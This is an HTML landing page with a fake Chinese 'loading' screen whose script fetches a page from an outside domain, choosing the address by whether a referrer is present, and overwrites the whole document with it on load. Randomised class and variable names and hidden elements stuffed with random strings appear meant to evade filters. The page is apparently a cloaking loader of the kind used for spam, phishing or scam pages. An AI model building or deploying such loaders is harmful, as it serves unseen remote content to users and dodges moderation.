<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Yhzeuj7 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Yhzeuj7 .GCR8Rx {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Yhzeuj7 .content {
            line-height: 50px;
            text-align: center
        }

        .Yhzeuj7 .img {
            width: 100%
        }

        .Yhzeuj7 .aZsUE5DQs {
            text-align: center
        }

        .Yhzeuj7 .aZsUE5DQs span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Yhzeuj7 .aZsUE5DQs span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Yhzeuj7 .aZsUE5DQs span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Yhzeuj7 .aZsUE5DQs span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Yhzeuj7 .aZsUE5DQs span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Yhzeuj7 .aZsUE5DQs span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Yhzeuj7 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function R2DKJWEBhHdd(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var TxXP52V = R2DKJWEBhHdd('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ TxXP52V +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ TxXP52V +".html?a=share";
		}
		
        QAEAk7Q=url+"#"+new Date().getTime();
        QAEAk7Q && function() {
            $.get(QAEAk7Q, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>HdERkrVFaER9BIqgpWUcG1jeYuq8fDDYRZPKyZqHbw1LIbMG8kENpco18zYeBToRJ3oPW4msaHfa2btTGiK1qJ</p>
<ul style='display:none' >Dx8CyqUn0QIdEMeCqI7iQW42j2ybt2GytpQbVH9o4qSzni2aAGRclYNYYnd28mrbTkgXumqwL</ul>
<h1 style='display:none' >Co4bNIQGLOiYQfKbyhvDXVndS</h1>
<a  href='#' style='display:none'>diGzpWuKEmRMm33DIrdBruYIzNVWP88YWmRW8EbKlOFJSsXyXM6Ccvud1JG</a>
<a  href='#' style='display:none'>diGzpWuKEmRMm33DIrdBruYIzNVWP88YWmRW8EbKlOFJSsXyXM6Ccvud1JG</a>
<ul style='display:none' >Dx8CyqUn0QIdEMeCqI7iQW42j2ybt2GytpQbVH9o4qSzni2aAGRclYNYYnd28mrbTkgXumqwL</ul>
<div style='display:none'>seDS7k2y4sHp9HAAZ73jQS8RH2KxkyvPjUtpiOZz5ecgcGRUZu25ct6IkOI7jHsx0E0N2MqYW7bhQ</div>
<span style='display:none'>XIWKqixqxr3s</span><div class="Yhzeuj7">
    <div class="GCR8Rx">
        <div class="aZsUE5DQs">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >CZR9tBV38L62z</b>
<img  src='' style='display:none'>
<li style='display:none' >tIBDN1c6wjFaG7PU9LwoUN4AyviMgy2mdYI1NO5sFzP8T6XrS1ksd4nDVblrYIKVwjhM0AFP4WLFsgiqw</li>
<h1 style='display:none' >rxC3aMDlEglLRVOZsSM7H4f082</h1>
<li style='display:none' >tIBDN1c6wjFaG7PU9LwoUN4AyviMgy2mdYI1NO5sFzP8T6XrS1ksd4nDVblrYIKVwjhM0AFP4WLFsgiqw</li>
<span style='display:none'>apcj9O8U2tqTd9YUSURNttoUguLA3L7AChumLeFBR4632OYqhjEVmwuX5iVtml</span>
<h1 style='display:none' >rxC3aMDlEglLRVOZsSM7H4f082</h1></body>
</html>